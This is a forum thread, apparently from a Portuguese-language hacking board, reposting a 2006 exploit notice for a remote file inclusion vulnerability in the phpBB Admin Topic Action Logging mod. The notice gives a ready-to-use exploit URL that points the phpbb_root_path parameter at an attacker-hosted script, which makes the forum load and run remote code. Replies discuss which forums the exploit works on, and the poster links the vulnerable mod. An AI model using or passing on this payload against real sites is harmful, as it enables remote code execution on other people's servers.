phpBB Admin Topic Action Logging Mod <= 0.94b File Include Vuln

Started by insanity, 04 de October , 2006, 03:58:19 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

insanity

04 de October , 2006, 03:58:19 PM
Code Select
           /      \
        \  \  ,,  /  /
         '-.`\()/`.-'
        .--_'(  )'_--.
       / /` /`""`\ `\ \           * SpiderZ Hacking Security *
        |  |  ><  |  |
        \  \      /  /
            '.__.'


# Author: SpiderZ
# Admin Topic Action Logging Remote File Inclusion Vulnerability
# Version 0.95 Admin Topic Action Logging
# For: phpBB ( 2.0.x - 2.0.21 )
# Site: www.spiderz.altervista.org
# Site02: www.spiderz.netsons.org
_________________________________________________________________________




http://site.com/[path]/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://[Evil_script]




-------------------------------------------------------------------------------------
# Download: http://www.nivisec.com/downloads/phpbb/admin_topic_action_logging_beta.zip
# File: 38 KB
-------------------------------------------------------------------------------------

# milw0rm.com [2006-10-04]

Ch1p5

#1
04 de October , 2006, 10:26:31 PM
vamos ver se eu entendi, esse xpl serve pra logar como admin nos foruns phpBB 2.0.x
eh isso???
flws


"Minha impressora está normal, mas não imprime"

vuln

#2
05 de October , 2006, 08:34:59 AM
Apesar do Insanity não ter explicado, eu tenho quase certeza pelo código que deve ser isso mesmo.

até mais
"O amor por princípio, a Ordem por base, o progresso por objetivo."

insanity

#3
05 de October , 2006, 03:42:29 PM
Quote from: "Ch1p5"vamos ver se eu entendi, esse xpl serve pra logar como admin nos foruns phpBB 2.0.x
eh isso???
flws

não,

Só funiciona só se tiver  o mod  phpbb admin topic action logging, instalado no PHPBB ...

Você pode fazer download desse mod aqui:

http://www.nivisec.com/downloads/phpbb/ ... g_beta.zip

ate mais
Print
Go Up Pages1
User actions